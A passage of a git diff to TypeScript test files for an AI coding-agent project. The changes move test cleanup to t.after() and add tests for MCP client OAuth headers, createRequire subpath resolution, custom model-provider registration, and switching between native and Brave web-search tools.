-    assert.equal(
-      captured.headers?.["Authorization"],
-      "Bearer tvly-test-key-abc123",
-      "Authorization header uses Bearer scheme",
-    );
+  // Verify Bearer auth header
+  assert.equal(
+    captured.headers?.["Authorization"],
+    "Bearer tvly-test-key-abc123",
+    "Authorization header uses Bearer scheme",
+  );
 
-    // Verify advanced search depth for LLM context (richer content)
-    assert.equal(captured.body?.search_depth, "advanced", "LLM context uses advanced search depth");
+  // Verify advanced search depth for LLM context (richer content)
+  assert.equal(captured.body?.search_depth, "advanced", "LLM context uses advanced search depth");
 
-    // Verify include_raw_content for full page text
-    assert.equal(captured.body?.include_raw_content, true, "LLM context requests raw_content");
+  // Verify include_raw_content for full page text
+  assert.equal(captured.body?.include_raw_content, true, "LLM context requests raw_content");
 
-    // Verify POST target URL
-    assert.equal(captured.url, "https://api.tavily.com/search", "Posts to Tavily search endpoint");
-  } finally {
-    restore();
-  }
+  // Verify POST target URL
+  assert.equal(captured.url, "https://api.tavily.com/search", "Posts to Tavily search endpoint");
 });
diff --git a/src/tests/marketplace-discovery.test.ts b/src/tests/marketplace-discovery.test.ts
index 538497b88..80e61f443 100644
--- a/src/tests/marketplace-discovery.test.ts
+++ b/src/tests/marketplace-discovery.test.ts
@@ -257,60 +257,51 @@ describe('Marketplace Discovery Contract Tests', { skip: skipReason }, () => {
       assert.strictEqual(result.summary.error, 0);
     });
 
-    it('should return error for directory without marketplace.json', () => {
+    it('should return error for directory without marketplace.json', (t) => {
       // Create a temp directory without marketplace.json
       const tmpDir = '/tmp/test-no-marketplace-' + Date.now();
       fs.mkdirSync(tmpDir, { recursive: true });
       
-      try {
-        const result = discoverMarketplace(tmpDir);
-        
-        assert.strictEqual(result.status, 'error');
-        assert.ok(result.error, 'Error message should be present');
-        assert.ok(result.error.includes('not found'),
-          `Error should mention 'not found', got: ${result.error}`);
-      } finally {
-        fs.rmSync(tmpDir, { recursive: true });
-      }
+      t.after(() => fs.rmSync(tmpDir, { recursive: true, force: true }));
+      const result = discoverMarketplace(tmpDir);
+      
+      assert.strictEqual(result.status, 'error');
+      assert.ok(result.error, 'Error message should be present');
+      assert.ok(result.error.includes('not found'),
+        `Error should mention 'not found', got: ${result.error}`);
     });
 
-    it('should return error for malformed marketplace.json', () => {
+    it('should return error for malformed marketplace.json', (t) => {
       const tmpDir = '/tmp/test-malformed-marketplace-' + Date.now();
       fs.mkdirSync(tmpDir + '/.claude-plugin', { recursive: true });
       fs.writeFileSync(tmpDir + '/.claude-plugin/marketplace.json', '{ this is not valid json }');
       
-      try {
-        const result = discoverMarketplace(tmpDir);
-        
-        assert.strictEqual(result.status, 'error');
-        assert.ok(result.error, 'Error message should be present');
-        assert.ok(result.error.includes('Failed to parse'),
-          `Error should mention 'Failed to parse', got: ${result.error}`);
-      } finally {
-        fs.rmSync(tmpDir, { recursive: true });
-      }
+      t.after(() => fs.rmSync(tmpDir, { recursive: true, force: true }));
+      const result = discoverMarketplace(tmpDir);
+      
+      assert.strictEqual(result.status, 'error');
+      assert.ok(result.error, 'Error message should be present');
+      assert.ok(result.error.includes('Failed to parse'),
+        `Error should mention 'Failed to parse', got: ${result.error}`);
     });
 
-    it('should return error for marketplace.json missing required fields', () => {
+    it('should return error for marketplace.json missing required fields', (t) => {
       const tmpDir = '/tmp/test-invalid-marketplace-' + Date.now();
       fs.mkdirSync(tmpDir + '/.claude-plugin', { recursive: true });
       // Valid JSON but missing required 'name' and 'plugins' fields
       fs.writeFileSync(tmpDir + '/.claude-plugin/marketplace.json', JSON.stringify({ description: 'test' }));
       
-      try {
-        const parseResult = parseMarketplaceJson(tmpDir);
-        
-        assert.strictEqual(parseResult.success, false);
-        if (!parseResult.success) {
-          assert.ok(parseResult.error.includes('missing'),
-            `Error should mention missing field, got: ${parseResult.error}`);
-        }
-      } finally {
-        fs.rmSync(tmpDir, { recursive: true });
+      t.after(() => fs.rmSync(tmpDir, { recursive: true, force: true }));
+      const parseResult = parseMarketplaceJson(tmpDir);
+      
+      assert.strictEqual(parseResult.success, false);
+      if (!parseResult.success) {
+        assert.ok(parseResult.error.includes('missing'),
+          `Error should mention missing field, got: ${parseResult.error}`);
       }
     });
 
-    it('should handle missing plugin directory gracefully', () => {
+    it('should handle missing plugin directory gracefully', (t) => {
       const tmpDir = '/tmp/test-missing-plugin-' + Date.now();
       fs.mkdirSync(tmpDir + '/.claude-plugin', { recursive: true });
       fs.writeFileSync(tmpDir + '/.claude-plugin/marketplace.json', JSON.stringify({
@@ -320,21 +311,18 @@ describe('Marketplace Discovery Contract Tests', { skip: skipReason }, () => {
         ]
       }));
       
-      try {
-        const result = discoverMarketplace(tmpDir);
-        
-        // Marketplace should parse ok, but the missing plugin should have error status
-        assert.strictEqual(result.status, 'error'); // Because one plugin has error
-        
-        const missingPlugin = result.plugins.find(p => p.name === 'missing-plugin');
-        assert.ok(missingPlugin, 'Missing plugin should be in results');
-        assert.strictEqual(missingPlugin.status, 'error');
-        assert.ok(missingPlugin.error, 'Missing plugin should have error message');
-        assert.ok(missingPlugin.error.includes('not found'),
-          `Error should mention 'not found', got: ${missingPlugin.error}`);
-      } finally {
-        fs.rmSync(tmpDir, { recursive: true });
-      }
+      t.after(() => fs.rmSync(tmpDir, { recursive: true, force: true }));
+      const result = discoverMarketplace(tmpDir);
+      
+      // Marketplace should parse ok, but the missing plugin should have error status
+      assert.strictEqual(result.status, 'error'); // Because one plugin has error
+      
+      const missingPlugin = result.plugins.find(p => p.name === 'missing-plugin');
+      assert.ok(missingPlugin, 'Missing plugin should be in results');
+      assert.strictEqual(missingPlugin.status, 'error');
+      assert.ok(missingPlugin.error, 'Missing plugin should have error message');
+      assert.ok(missingPlugin.error.includes('not found'),
+        `Error should mention 'not found', got: ${missingPlugin.error}`);
     });
   });
 
diff --git a/src/tests/mcp-client-oauth.test.ts b/src/tests/mcp-client-oauth.test.ts
new file mode 100644
index 000000000..568e28eab
--- /dev/null
+++ b/src/tests/mcp-client-oauth.test.ts
@@ -0,0 +1,219 @@
+/**
+ * Tests for MCP client OAuth auth provider support on HTTP transport.
+ *
+ * Verifies that:
+ *  1. HTTP server configs with `headers` pass them to the transport via requestInit
+ *  2. HTTP server configs with `oauth` config construct an OAuthClientProvider
+ *  3. Servers without auth still connect without an auth provider
+ *  4. Environment variable references in headers are resolved
+ *
+ * Reproduces issue #2160 — MCP HTTP transport lacks OAuth auth provider,
+ * causing 401 errors when connecting to remote MCP servers (Sentry, Linear, etc.)
+ */
+import test from "node:test";
+import assert from "node:assert/strict";
+import { buildHttpTransportOpts } from "../resources/extensions/mcp-client/auth.ts";
+
+// ── Transport construction (SDK sanity checks) ───────────────────────────────
+
+test("HTTP transport without auth config creates transport with no authProvider", async () => {
+	const { StreamableHTTPClientTransport } = await import(
+		"@modelcontextprotocol/sdk/client/streamableHttp.js"
+	);
+
+	const transport = new StreamableHTTPClientTransport(
+		new URL("https://example.com/mcp"),
+	);
+	assert.ok(transport, "Transport should be created without auth");
+});
+
+test("HTTP transport with authProvider creates transport that can authenticate", async () => {
+	const { StreamableHTTPClientTransport } = await import(
+		"@modelcontextprotocol/sdk/client/streamableHttp.js"
+	);
+
+	// Minimal OAuthClientProvider mock
+	const mockAuthProvider = {
+		get redirectUrl() { return "http://localhost:3000/callback"; },
+		get clientMetadata() {
+			return {
+				redirect_uris: ["http://localhost:3000/callback"],
+				client_name: "gsd-test",
+			};
+		},
+		clientInformation: () => undefined,
+		tokens: () => ({ access_token: "test-token", token_type: "Bearer" }),
+		saveTokens: () => {},
+		redirectToAuthorization: () => {},
+		saveCodeVerifier: () => {},
+		codeVerifier: () => "verifier",
+	};
+
+	const transport = new StreamableHTTPClientTransport(
+		new URL("https://example.com/mcp"),
+		{ authProvider: mockAuthProvider },
+	);
+	assert.ok(transport, "Transport should accept authProvider option");
+});
+
+test("HTTP transport with requestInit headers passes them to requests", async () => {
+	const { StreamableHTTPClientTransport } = await import(
+		"@modelcontextprotocol/sdk/client/streamableHttp.js"
+	);
+
+	const transport = new StreamableHTTPClientTransport(
+		new URL("https://example.com/mcp"),
+		{
+			requestInit: {
+				headers: {
+					Authorization: "Bearer my-token",
+				},
+			},
+		},
+	);
+	assert.ok(transport, "Transport should accept requestInit with headers");
+});
+
+// ── buildHttpTransportOpts ──────────────────────────────────────────────────
+
+test("buildHttpTransportOpts returns empty opts for config without auth", () => {
+	const opts = buildHttpTransportOpts({});
+	assert.deepEqual(opts, {}, "No auth config should produce empty opts");
+});
+
+test("buildHttpTransportOpts returns requestInit.headers for config with headers", () => {
+	const opts = buildHttpTransportOpts({
+		headers: { Authorization: "Bearer tok_123" },
+	});
+
+	assert.ok(opts.requestInit, "Should produce requestInit");
+	const headers = opts.requestInit!.headers as Record<string, string>;
+	assert.equal(headers.Authorization, "Bearer tok_123");
+});
+
+test("buildHttpTransportOpts resolves env vars in header values", () => {
+	process.env.__TEST_MCP_TOKEN = "secret-456";
+
+	const opts = buildHttpTransportOpts({
+		headers: { Authorization: "Bearer ${__TEST_MCP_TOKEN}" },
+	});
+
+	const headers = opts.requestInit!.headers as Record<string, string>;
+	assert.equal(
+		headers.Authorization,
+		"Bearer secret-456",
+		"Env vars in headers should be resolved",
+	);
+
+	delete process.env.__TEST_MCP_TOKEN;
+});
+
+test("buildHttpTransportOpts resolves multiple env vars in a single header", () => {
+	process.env.__TEST_MCP_USER = "alice";
+	process.env.__TEST_MCP_PASS = "s3cret";
+
+	const opts = buildHttpTransportOpts({
+		headers: { "X-Custom": "${__TEST_MCP_USER}:${__TEST_MCP_PASS}" },
+	});
+
+	const headers = opts.requestInit!.headers as Record<string, string>;
+	assert.equal(headers["X-Custom"], "alice:s3cret");
+
+	delete process.env.__TEST_MCP_USER;
+	delete process.env.__TEST_MCP_PASS;
+});
+
+test("buildHttpTransportOpts replaces missing env vars with empty string", () => {
+	delete process.env.__NONEXISTENT_VAR;
+
+	const opts = buildHttpTransportOpts({
+		headers: { Authorization: "Bearer ${__NONEXISTENT_VAR}" },
+	});
+
+	const headers = opts.requestInit!.headers as Record<string, string>;
+	assert.equal(headers.Authorization, "Bearer ");
+});
+
+test("buildHttpTransportOpts creates OAuthClientProvider for oauth config", () => {
+	const opts = buildHttpTransportOpts({
+		oauth: {
+			clientId: "my-client",
+			scopes: ["read"],
+		},
+	});
+
+	assert.ok(opts.authProvider, "OAuth config should produce an authProvider");
+	assert.ok(opts.authProvider.clientMetadata, "authProvider should have clientMetadata");
+	assert.equal(typeof opts.authProvider.tokens, "function", "authProvider.tokens should be a function");
+	assert.equal(typeof opts.authProvider.saveTokens, "function", "authProvider.saveTokens should be a function");
+	assert.equal(typeof opts.authProvider.redirectToAuthorization, "function");
+	assert.equal(typeof opts.authProvider.codeVerifier, "function");
+	assert.equal(typeof opts.authProvider.saveCodeVerifier, "function");
+});
+
+test("OAuth provider clientInformation includes clientId", () => {
+	const opts = buildHttpTransportOpts({
+		oauth: {
+			clientId: "test-id-123",
+			clientSecret: "test-secret",
+		},
+	});
+
+	const info = opts.authProvider!.clientInformation();
+	assert.ok(info, "clientInformation should return data");
+	assert.equal(info!.client_id, "test-id-123");
+	assert.equal((info as any).client_secret, "test-secret");
+});
+
+test("OAuth provider clientMetadata includes scopes", () => {
+	const opts = buildHttpTransportOpts({
+		oauth: {
+			clientId: "scoped-client",
+			scopes: ["issues:read", "issues:write"],
+		},
+	});
+
+	const meta = opts.authProvider!.clientMetadata;
+	assert.ok(meta, "clientMetadata should exist");
+	assert.equal((meta as any).scope, "issues:read issues:write");
+});
+
+test("OAuth provider stores and retrieves tokens", () => {
+	const opts = buildHttpTransportOpts({
+		oauth: { clientId: "token-test" },
+	});
+
+	const provider = opts.authProvider!;
+
+	// Initially no tokens
+	assert.equal(provider.tokens(), undefined);
+
+	// Save tokens
+	const tokens = { access_token: "at_123", token_type: "Bearer", refresh_token: "rt_456" };
+	provider.saveTokens(tokens);
+
+	// Retrieve tokens
+	const stored = provider.tokens();
+	assert.ok(stored);
+	assert.equal(stored!.access_token, "at_123");
+});
+
+test("OAuth provider stores and retrieves code verifier", () => {
+	const opts = buildHttpTransportOpts({
+		oauth: { clientId: "pkce-test" },
+	});
+
+	const provider = opts.authProvider!;
+	provider.saveCodeVerifier("my-verifier-string");
+	assert.equal(provider.codeVerifier(), "my-verifier-string");
+});
+
+test("OAuth takes precedence over headers when both are provided", () => {
+	const opts = buildHttpTransportOpts({
+		headers: { Authorization: "Bearer static-token" },
+		oauth: { clientId: "oauth-client" },
+	});
+
+	assert.ok(opts.authProvider, "OAuth should be used when both are provided");
+	assert.ok(!opts.requestInit, "requestInit should not be set when OAuth is active");
+});
diff --git a/src/tests/mcp-createRequire.test.ts b/src/tests/mcp-createRequire.test.ts
new file mode 100644
index 000000000..5f1292866
--- /dev/null
+++ b/src/tests/mcp-createRequire.test.ts
@@ -0,0 +1,48 @@
+/**
+ * Regression test for #3603 — MCP server subpath imports via createRequire
+ *
+ * The ESM wildcard export map in @modelcontextprotocol/sdk does not resolve
+ * subpath imports correctly. The fix uses createRequire from node:module to
+ * resolve wildcard subpaths via the CJS resolver which auto-appends .js.
+ *
+ * Structural verification test — reads source to confirm createRequire import
+ * and _require.resolve usage exist.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'mcp-server.ts'), 'utf-8');
+
+describe('MCP server createRequire subpath resolution (#3603)', () => {
+  test('createRequire is imported from node:module', () => {
+    assert.match(source, /import\s*\{\s*createRequire\s*\}\s*from\s*['"]node:module['"]/,
+      'createRequire should be imported from node:module');
+  });
+
+  test('_require is created from import.meta.url', () => {
+    assert.match(source, /createRequire\(import\.meta\.url\)/,
+      '_require should be created using createRequire(import.meta.url)');
+  });
+
+  test('_require.resolve is used for subpath imports', () => {
+    assert.match(source, /_require\.resolve\(/,
+      '_require.resolve should be used for subpath resolution');
+  });
+
+  test('server/stdio subpath uses _require.resolve', () => {
+    assert.match(source, /_require\.resolve\(`\$\{MCP_PKG\}\/server\/stdio`\)/,
+      'server/stdio import should use _require.resolve');
+  });
+
+  test('types subpath uses _require.resolve', () => {
+    assert.match(source, /_require\.resolve\(`\$\{MCP_PKG\}\/types`\)/,
+      'types import should use _require.resolve');
+  });
+});
diff --git a/src/tests/model-registry-custom-provider.test.ts b/src/tests/model-registry-custom-provider.test.ts
new file mode 100644
index 000000000..323b8776b
--- /dev/null
+++ b/src/tests/model-registry-custom-provider.test.ts
@@ -0,0 +1,25 @@
+/**
+ * Regression test for #3531: models.json custom providers must be registered
+ * in registeredProviders so isProviderRequestReady() returns true.
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+test("parseModels registers custom providers in registeredProviders (#3531)", () => {
+  const src = readFileSync(
+    join(__dirname, "..", "..", "packages", "pi-coding-agent", "src", "core", "model-registry.ts"),
+    "utf-8",
+  );
+  // The fix adds registeredProviders.set() inside parseModels
+  const parseModelsBlock = src.slice(src.indexOf("private parseModels"));
+  assert.ok(
+    parseModelsBlock.includes("registeredProviders.set") ||
+    parseModelsBlock.includes("this.registeredProviders.set"),
+    "parseModels must register custom providers in registeredProviders",
+  );
+});
diff --git a/src/tests/native-search.test.ts b/src/tests/native-search.test.ts
index 725c28f66..c6ff41310 100644
--- a/src/tests/native-search.test.ts
+++ b/src/tests/native-search.test.ts
@@ -295,94 +295,91 @@ test("before_provider_request skips when payload is falsy", async () => {
   assert.equal(result, undefined, "Should return undefined for null payload");
 });
 
-test("model_select disables Brave tools when Anthropic + no BRAVE_API_KEY", async () => {
+test("model_select disables Brave tools when Anthropic + no BRAVE_API_KEY", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: undefined,
-      source: "set",
-    });
-
-    const active = pi.getActiveTools();
-    assert.ok(!active.includes("search-the-web"), "search-the-web should be disabled");
-    assert.ok(!active.includes("search_and_read"), "search_and_read should be disabled");
-    assert.ok(!active.includes("google_search"), "google_search should be disabled");
-    assert.ok(active.includes("fetch_page"), "fetch_page should remain active");
-    assert.ok(active.includes("bash"), "Other tools should remain active");
-  } finally {
+  t.after(() => {
     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  const active = pi.getActiveTools();
+  assert.ok(!active.includes("search-the-web"), "search-the-web should be disabled");
+  assert.ok(!active.includes("search_and_read"), "search_and_read should be disabled");
+  assert.ok(!active.includes("google_search"), "google_search should be disabled");
+  assert.ok(active.includes("fetch_page"), "fetch_page should remain active");
+  assert.ok(active.includes("bash"), "Other tools should remain active");
 });
 
-test("model_select disables all custom search tools when Anthropic even with BRAVE_API_KEY", async () => {
+test("model_select disables all custom search tools when Anthropic even with BRAVE_API_KEY", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   process.env.BRAVE_API_KEY = "test-key";
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: undefined,
-      source: "set",
-    });
-
-    const active = pi.getActiveTools();
-    assert.ok(!active.includes("search-the-web"), "search-the-web should be disabled for Anthropic");
-    assert.ok(!active.includes("search_and_read"), "search_and_read should be disabled for Anthropic");
-    assert.ok(!active.includes("google_search"), "google_search should be disabled for Anthropic");
-    assert.ok(active.includes("fetch_page"), "fetch_page should remain active");
-  } finally {
+  t.after(() => {
     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  const active = pi.getActiveTools();
+  assert.ok(!active.includes("search-the-web"), "search-the-web should be disabled for Anthropic");
+  assert.ok(!active.includes("search_and_read"), "search_and_read should be disabled for Anthropic");
+  assert.ok(!active.includes("google_search"), "google_search should be disabled for Anthropic");
+  assert.ok(active.includes("fetch_page"), "fetch_page should remain active");
 });
 
-test("model_select re-enables Brave tools when switching away from Anthropic", async () => {
+test("model_select re-enables Brave tools when switching away from Anthropic", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    // First: select Anthropic — disables Brave tools
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: undefined,
-      source: "set",
-    });
-
-    let active = pi.getActiveTools();
-    assert.ok(!active.includes("search-the-web"), "Should disable after Anthropic select");
-
-    // Second: switch to non-Anthropic — re-enables
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "openai", name: "gpt-4o" },
-      previousModel: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      source: "set",
-    });
-
-    active = pi.getActiveTools();
-    assert.ok(active.includes("search-the-web"), "search-the-web should be re-enabled");
-    assert.ok(active.includes("search_and_read"), "search_and_read should be re-enabled");
-    assert.ok(active.includes("google_search"), "google_search should be re-enabled");
-  } finally {
+  t.after(() => {
     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  // First: select Anthropic — disables Brave tools
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  let active = pi.getActiveTools();
+  assert.ok(!active.includes("search-the-web"), "Should disable after Anthropic select");
+
+  // Second: switch to non-Anthropic — re-enables
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "openai", name: "gpt-4o" },
+    previousModel: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    source: "set",
+  });
+
+  active = pi.getActiveTools();
+  assert.ok(active.includes("search-the-web"), "search-the-web should be re-enabled");
+  assert.ok(active.includes("search_and_read"), "search_and_read should be re-enabled");
+  assert.ok(active.includes("google_search"), "google_search should be re-enabled");
 });
 
 test("model_select shows 'Native Anthropic web search active' for Anthropic provider", async () => {
@@ -406,31 +403,30 @@ test("model_select shows 'Native Anthropic web search active' for Anthropic prov
   );
 });
 
-test("model_select shows warning for non-Anthropic without Brave key", async () => {
+test("model_select shows warning for non-Anthropic without Brave key", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "openai", name: "gpt-4o" },
-      previousModel: undefined,
-      source: "set",
-    });
-
-    const warning = pi.notifications.find((n) => n.level === "warning");
-    assert.ok(warning, "Should show warning for non-Anthropic without Brave key");
-    assert.ok(
-      warning!.message.includes("Anthropic"),
-      `Warning should mention Anthropic — got: ${warning!.message}`
-    );
-  } finally {
+  t.after(() => {
     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "openai", name: "gpt-4o" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  const warning = pi.notifications.find((n) => n.level === "warning");
+  assert.ok(warning, "Should show warning for non-Anthropic without Brave key");
+  assert.ok(
+    warning!.message.includes("Anthropic"),
+    `Warning should mention Anthropic — got: ${warning!.message}`
+  );
 });
 
 test("session_start resets search count and shows no startup notification", async () => {
@@ -454,160 +450,157 @@ test("CUSTOM_SEARCH_TOOL_NAMES contains all custom search tools", () => {
   assert.deepEqual(CUSTOM_SEARCH_TOOL_NAMES, ["search-the-web", "search_and_read", "google_search"]);
 });
 
-test("before_provider_request removes Brave tools from payload when no BRAVE_API_KEY", async () => {
+test("before_provider_request removes Brave tools from payload when no BRAVE_API_KEY", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: undefined,
-      source: "set",
-    });
-
-    const payload: Record<string, unknown> = {
-      model: "claude-sonnet-4-6-20250514",
-      tools: [
-        { name: "bash", type: "function" },
-        { name: "search-the-web", type: "function" },
-        { name: "search_and_read", type: "function" },
-        { name: "google_search", type: "function" },
-        { name: "fetch_page", type: "function" },
-      ],
-    };
-
-    const result = await pi.fire("before_provider_request", {
-      type: "before_provider_request",
-      payload,
-    });
-
-    const tools = ((result as any)?.tools ?? payload.tools) as any[];
-    const names = tools.map((t: any) => t.name);
-
-    assert.ok(!names.includes("search-the-web"), "search-the-web should be removed from payload");
-    assert.ok(!names.includes("search_and_read"), "search_and_read should be removed from payload");
-    assert.ok(!names.includes("google_search"), "google_search should be removed from payload");
-    assert.ok(names.includes("bash"), "bash should remain");
-    assert.ok(names.includes("fetch_page"), "fetch_page should remain");
-    assert.ok(names.includes("web_search"), "native web_search should be injected");
-  } finally {
+  t.after(() => {
     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  const payload: Record<string, unknown> = {
+    model: "claude-sonnet-4-6-20250514",
+    tools: [
+      { name: "bash", type: "function" },
+      { name: "search-the-web", type: "function" },
+      { name: "search_and_read", type: "function" },
+      { name: "google_search", type: "function" },
+      { name: "fetch_page", type: "function" },
+    ],
+  };
+
+  const result = await pi.fire("before_provider_request", {
+    type: "before_provider_request",
+    payload,
+  });
+
+  const tools = ((result as any)?.tools ?? payload.tools) as any[];
+  const names = tools.map((t: any) => t.name);
+
+  assert.ok(!names.includes("search-the-web"), "search-the-web should be removed from payload");
+  assert.ok(!names.includes("search_and_read"), "search_and_read should be removed from payload");
+  assert.ok(!names.includes("google_search"), "google_search should be removed from payload");
+  assert.ok(names.includes("bash"), "bash should remain");
+  assert.ok(names.includes("fetch_page"), "fetch_page should remain");
+  assert.ok(names.includes("web_search"), "native web_search should be injected");
 });
 
-test("before_provider_request removes all custom search tools from payload even with BRAVE_API_KEY", async () => {
+test("before_provider_request removes all custom search tools from payload even with BRAVE_API_KEY", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   process.env.BRAVE_API_KEY = "test-key";
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: undefined,
-      source: "set",
-    });
-
-    const payload: Record<string, unknown> = {
-      model: "claude-sonnet-4-6-20250514",
-      tools: [
-        { name: "search-the-web", type: "function" },
-        { name: "search_and_read", type: "function" },
-        { name: "google_search", type: "function" },
-        { name: "fetch_page", type: "function" },
-      ],
-    };
-
-    const result = await pi.fire("before_provider_request", {
-      type: "before_provider_request",
-      payload,
-    });
-
-    const tools = ((result as any)?.tools ?? payload.tools) as any[];
-    const names = tools.map((t: any) => t.name);
-
-    assert.ok(!names.includes("search-the-web"), "search-the-web should be removed for Anthropic");
-    assert.ok(!names.includes("search_and_read"), "search_and_read should be removed for Anthropic");
-    assert.ok(!names.includes("google_search"), "google_search should be removed for Anthropic");
-    assert.ok(names.includes("fetch_page"), "fetch_page should remain");
-    assert.ok(names.includes("web_search"), "native web_search should be injected");
-  } finally {
+  t.after(() => {
     if (originalKey) process.env.BRAVE_API_KEY = originalKey;
     else delete process.env.BRAVE_API_KEY;
-  }
+  });
+  const pi = createMockPI();
+  registerNativeSearchHooks(pi);
+
+  await pi.fire("model_select", {
+    type: "model_select",
+    model: { provider: "anthropic", name: "claude-sonnet-4-6" },
+    previousModel: undefined,
+    source: "set",
+  });
+
+  const payload: Record<string, unknown> = {
+    model: "claude-sonnet-4-6-20250514",
+    tools: [
+      { name: "search-the-web", type: "function" },
+      { name: "search_and_read", type: "function" },
+      { name: "google_search", type: "function" },
+      { name: "fetch_page", type: "function" },
+    ],
+  };
+
+  const result = await pi.fire("before_provider_request", {
+    type: "before_provider_request",
+    payload,
+  });
+
+  const tools = ((result as any)?.tools ?? payload.tools) as any[];
+  const names = tools.map((t: any) => t.name);
+
+  assert.ok(!names.includes("search-the-web"), "search-the-web should be removed for Anthropic");
+  assert.ok(!names.includes("search_and_read"), "search_and_read should be removed for Anthropic");
+  assert.ok(!names.includes("google_search"), "google_search should be removed for Anthropic");
+  assert.ok(names.includes("fetch_page"), "fetch_page should remain");
+  assert.ok(names.includes("web_search"), "native web_search should be injected");
 });
 
 // ─── BUG-1 regression: duplicate Brave tools on repeated provider toggle ────
 
-test("model_select re-enable does not duplicate Brave tools across toggle cycles", async () => {
+test("model_select re-enable does not duplicate Brave tools across toggle cycles", async (t) => {
   const originalKey = process.env.BRAVE_API_KEY;
   delete process.env.BRAVE_API_KEY;
 
-  try {
-    const pi = createMockPI();
-    registerNativeSearchHooks(pi);
-
-    // Cycle 1: Anthropic disables Brave tools
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: undefined,
-      source: "set",
-    });
-    assert.ok(!pi.getActiveTools().includes("search-the-web"), "Disabled after 1st Anthropic select");
-
-    // Cycle 1: switch away re-enables
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "openai", name: "gpt-4o" },
-      previousModel: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      source: "set",
-    });
-    let active = pi.getActiveTools();
-    assert.equal(
-      active.filter((t) => t === "search-the-web").length, 1,
-      "search-the-web exactly once after first re-enable"
-    );
-
-    // Cycle 2: Anthropic again
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      previousModel: { provider: "openai", name: "gpt-4o" },
-      source: "set",
-    });
-
-    // Cycle 2: switch away again — must NOT accumulate duplicates
-    await pi.fire("model_select", {
-      type: "model_select",
-      model: { provider: "openai", name: "gpt-4o" },
-      previousModel: { provider: "anthropic", name: "claude-sonnet-4-6" },
-      source: "set",
-    });
-    active = pi.getActiveTools();
-    assert.equal(
-      active.filter((t) => t === "search-the-web").length, 1,
-      "search-the-web exactly once after second re-enable (no duplicates)"
-    );
-    assert.equal(
-      active.filter((t) => t === "search_and_read").length, 1,
-      "search_and_read exactly once (no duplicates)"
-    );
-    assert.equal(
-      active.filter((t) => t === "google_search").length, 1,
-      "google_search exactly once (no duplicates)"
-    );
-  } finally {
+  t.after(() => {
